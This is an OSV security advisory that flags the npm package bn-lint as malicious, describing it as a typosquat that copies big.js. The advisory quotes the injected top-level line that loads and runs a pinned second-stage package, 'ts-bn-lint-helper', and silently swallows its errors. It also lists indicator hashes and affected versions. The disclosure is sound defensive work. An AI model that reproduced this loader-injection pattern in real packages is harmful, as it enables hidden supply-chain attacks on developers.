MAL-2026-6376

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/bn-lint/MAL-2026-6376.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6376

Published

2026-06-24T06:26:20Z

Modified

2026-06-26T21:46:45.395184883Z

Summary

Malicious code in bn-lint (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (c14057d91b2283926b2b0c1093a66db17c40efbd0ceb21c29b0bdbfa79736da5)

Package is published as 'bn-lint' but ships a verbatim copy of MikeMcl/big.js (README, source, version banner v7.0.1, and repo URL all identify as big.js). Both entrypoints, big.js and big.mjs, have been modified at lines 605-606 to inject const helper = require("ts-bn-lint-helper"); helper.from_str().then(e => e).catch(e => { }); at module top level. Any require('bn-lint') or import of the package immediately loads and invokes the separately-published, pinned ts-bn-lint-helper@3.1.19 (declared in package.json line 58). The .then(e => e).catch(e => { }) wrapping silently swallows both resolution and rejection values, suppressing logs, thrown errors, and rejected promises so the secondary payload's execution is invisible to a developer using what they believe to be a big.js arithmetic library. The combination of impersonated identity, top-level loader injection into an otherwise unrelated arithmetic library, a pinned untrusted second-stage dependency, and deliberate error suppression is consistent with a typosquat-with-payload supply-chain attack rather than a legitimate fork.

Database specific

{
    "malicious-packages-origins": [
        {
            "versions": [
                "3.0.8"
            ],
            "modified_time": "2026-06-24T06:26:20Z",
            "sha256": "c14057d91b2283926b2b0c1093a66db17c40efbd0ceb21c29b0bdbfa79736da5",
            "id": "IN-MAL-2026-007428",
            "source": "amazon-inspector",
            "import_time": "2026-06-24T07:47:32.297622673Z"
        },
        {
            "versions": [
                "3.0.6"
            ],
            "modified_time": "2026-06-26T21:03:07Z",
            "sha256": "ffccaf731dc19ad034e98203f9fd0e922fcf209bef4b416c9afef09b20e2eb2d",
            "id": "IN-MAL-2026-007664",
            "source": "amazon-inspector",
            "import_time": "2026-06-26T21:34:02.352023988Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / bn-lint

Package

Name: bn-lint; View open source insights on deps.dev
Purl: pkg:npm/bn-lint

Affected ranges

Affected versions

3.*

3.0.6

3.0.8

Database specific

cwes

[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]

indicators

{
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-ym1Zdsn1Cxex3/wH3HHuIj0KbALDBvtsCstUX813bc/g8EQubrvZq/Ic0mZeynrwIJ48MevGb6mwg4F+YXtzcA==",
                "sha1": "c8239e925acfba12c5db3098bede9443d5d46943"
            },
            "filename": "bn-lint-3.0.8.tgz"
        }
    ],
    "evidence_files": [
        {
            "path": "big.js",
            "tlsh": "63c2658c3ac67579593363788f465088eb38525712c8b286b4ae63b46f78cb107b5fdc",
            "sha256": "00373642f38ae2e845aa36a8f243352a9014829c242360e6958ee49730883290"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/bn-lint/MAL-2026-6376.json"